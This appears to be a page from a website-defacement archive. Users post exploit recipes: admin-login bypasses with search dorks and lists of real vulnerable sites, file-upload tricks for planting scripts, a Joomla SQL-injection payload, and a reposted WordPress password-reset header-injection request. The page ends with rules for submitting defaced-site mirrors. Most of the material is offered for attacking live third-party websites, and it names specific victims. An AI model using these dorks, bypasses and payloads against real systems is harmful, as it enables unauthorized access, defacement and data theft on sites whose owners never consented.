Bypass Admin WebositeZ [Noredirect]

[-] Title : Bypass Admin WebositeZ [Noredirect]
[-] Credit : Magelang1337
[-] Vendor : https://webositez.com/
[-] Date : 19-1-2018
[-] Dork 1 :"Design By WebositeZ"
[-] Dork 2 : "Powered By WebositeZ"
[-]
========================================================================

[-]
[-] Admin page : target.com/webcms/login.php or target.com/admin/login.php
[-] Note: Sometimes the admin page displays a 404 not found. It's not a matter of can still be
[-]
[-] POC : Use Addons Norediret [Mozilla]
[-] target.com/webcms/index.php or target.com/login/index.php
[-]
[-] Demo : http://www.raynesparkcourt.com/admin/login.php
[-]
[-]
[-] Sh0ut : nginxDEX - Codename - AlldefacerIndonesia


Reference : [http://www.magelang1337.com/2018/01/bypass-admin-webositez-    noredirect.html](http://www.magelang1337.com/2018/01/bypass-admin-webositez-noredirect.html     "bypassadmin")


written by nginxDEX 3 months, 1 week ago

Sitefinity file uplod vulnerability

Exploit title: sitefinity file uplodo vulnerability


    #Dork>>>>>>>  : inurl:/sitefinity/login.aspx
#Exploit>>>> : sitefinity/usercontrols/dialogs/documenteditordialog.aspx
###########################################################################
>>[search Dork]<<inurl:/sitefinity/login.aspx
>>[pilih web]<<
>>[exploit poc] <<http://site.target/sitefinity/usercontrols/dialogs/documenteditordialog.aspx
>>[uplod script]<<
>>[panggil script setelah uplod]<< http://site.target/file/namafile.htm
###########################################################################
(Webnya dicek satu satu,,,,ciri web ga vuln,setelah sobat,masukin exploit gak muncul kolom buat uplod.....ok)
###########################################################################
**create by >>T-1
**Team>>> Beginner Conference


written by T-1 4 months ago

chat #new feature

Chat is available now!
'ss'


Enjoy!


written by masculan 4 months ago

Admin Page Noredirect [softventurs]


# Exploit Title: Admin Page Noredirect [softventurs]
# Author : Magelang1337
# Google Dork 1 : Developed by Softventurs
# Google Dork 2 : Designed By - softventurs
# Google Dork 3 : Powered By - softventurs
# Date : 21.12.2017
# Vendor Home: http://www.softventurs.in
# Tested On Mozilla Firefox
#################################################################################

Tutorial :

[+] Download Addons "Noredirect" [Mozilla]
[+] insert admin page >> http://gauravbooks.com/admin/ to Addons Mozilla [Noredirect]
[+] Open new tab on Mozilla >> http://gauravbooks.com/admin/main.php

Demo :

http://gauravbooks.com/admin/
http://www.chaperonbiotech.com/admin/
http://www.rataniti.com/admin/
http://garimaprakashan.com/admin/
http://www.baradeviiti.org/admin/
http://deltinlaboratories.com/admin/
http://www.paradisepublicschool.co.in/admin/
http://chandralokprakashan.com/admin/
http://www.sagimetalbox.com/admin/
http://timesacademychakarpur.in/admin/
http://maavaishnoiti.org/admin/
http://blossombuds.org/admin/
http://baradeviiti.in/admin/
http://www.stitchindia.co/admin/
http://www.gurukulit.com/admin/
http://meplast.in/admin/
http://www.aksharschool.in/admin/
http://iteeseducation.org/admin/

::: Magelang1337 ~ All defacer indonesia
#################################################################################


written by nginxDEX-MnHBlog 4 months ago

ScoringStar.com- CMS Filemanager


# Exploit Title : ScoringStar.com- CMS Filemanager
# Dorks : CMS/Filemanager/index.html "ScoringStar.com"
# Exploit Author: **[Magelang1337]**
#################################################
# SEARCH DORKS > CMS/Filemanager/index.html "ScoringStar.com"
# EXPLOIT POC : www.site.target/CMS/Filemanager/index.html
# UPLOAD YOUR FILE
# EXEMPLE : File.txt [Rename Your File Ext. Html/PhP and bypass ect]
# FILE : Use Ur Brain :D
# DEMO : ....
# http://voiceofcricketers.com/
# http://rockingroyals.scoringstar.com
# Greetz : all indonesia defacer
#################################################```


written by nginxDEX-MnHBlog 4 months, 2 weeks ago

Vietnam Dns Hijacked

Vietnam Dns Hijacked by jrb team.


look for more:


mirrors of jrb team


written by masculan 5 months, 2 weeks ago

teams #new feature

teams feature is active now, enjoy!


written by masculan 7 months, 3 weeks ago

WordPress < 4.7.4 - Unauthorized Password Reset


=============================================
- Discovered by: Dawid Golunski
- dawid[at]legalhackers.com
- https://legalhackers.com

- CVE-2017-8295
- Release date: 03.05.2017
- Revision 1.0
- Severity: Medium/High
=============================================

Source: https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html

If an attacker sends a request similar to the one below to a default Wordpress
installation that is accessible by the IP address (IP-based vhost):

-----[ HTTP Request ]----

POST /wp/wordpress/wp-login.php?action=lostpassword HTTP/1.1
Host: injected-attackers-mxserver.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 56

user_login=admin&redirect_to=&wp-submit=Get+New+Password

------------------------

Wordpress will trigger the password reset function for the admin user account.

Because of the modified HOST header, the SERVER_NAME will be set to
the hostname of attacker's choice.
As a result, Wordpress will pass the following headers and email body to the
/usr/bin/sendmail wrapper:

------[ resulting e-mail ]-----

Subject: [CompanyX WP] Password Reset
Return-Path: <[email protected]>
From: WordPress <[email protected]>
Message-ID: <[email protected]>
X-Priority: 3
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Someone requested that the password be reset for the following account:

http://companyX-wp/wp/wordpress/

Username: admin

If this was a mistake, just ignore this email and nothing will happen.

To reset your password, visit the following address:

<http://companyX-wp/wp/wordpress/wp-login.php? action=rp&key=AceiMFmkMR4fsmwxIZtZ&login=admin>

-------------------------------

As we can see, fields Return-Path, From, and Message-ID, all have the attacker's
domain set.

The verification of the headers can be performed by replacing /usr/sbin/sendmail with a
bash script of:

#!/bin/bash
cat > /tmp/outgoing-email


written by T3kfurD4GLi 7 months, 4 weeks ago

Joomla! Component Event Registration Pro Calendar v4.1.3 - SQL Injection


# Exploit Title: Joomla! Component Event Registration Pro Calendar v4.1.3 - SQL Injection
# Dork: N/A
# Date: 02.08.2017
# Vendor : http://joomlashowroom.com/
# Software: https://www.joomlashowroom.com/products/event-registration-pro-calendar
# Demo: http://demo3.joomlashowroom.com/
# Version: 4.1.3
# # # # #
# Author: Ihsan Sencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_registrationpro&view=category&id=[SQL]
# -33++union+select++make_set(6,@:=0x0a,(select(1)from(information_schema.columns)[email protected]:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),2,3,4--+-
# Etc..
# # # # #


written by ane 8 months, 3 weeks ago

Site User Guide

zone-add


* If notifier username is not in index, mirror is not approve.


* Unapproved mirrors are automatically deleted after a week.


* A domain can be hacked once a year.


* Max 20 subdomains of a domain can be hacked.


* You can send 20 mass mirrors at once.


* You can send a mirror without a member.


* You can register and send an exploit.


Thanks you for choosing us.


                                                                             zone-add.org


written by T3kfurD4GLi 9 months, 2 weeks ago

zone-add.org © All rights reserved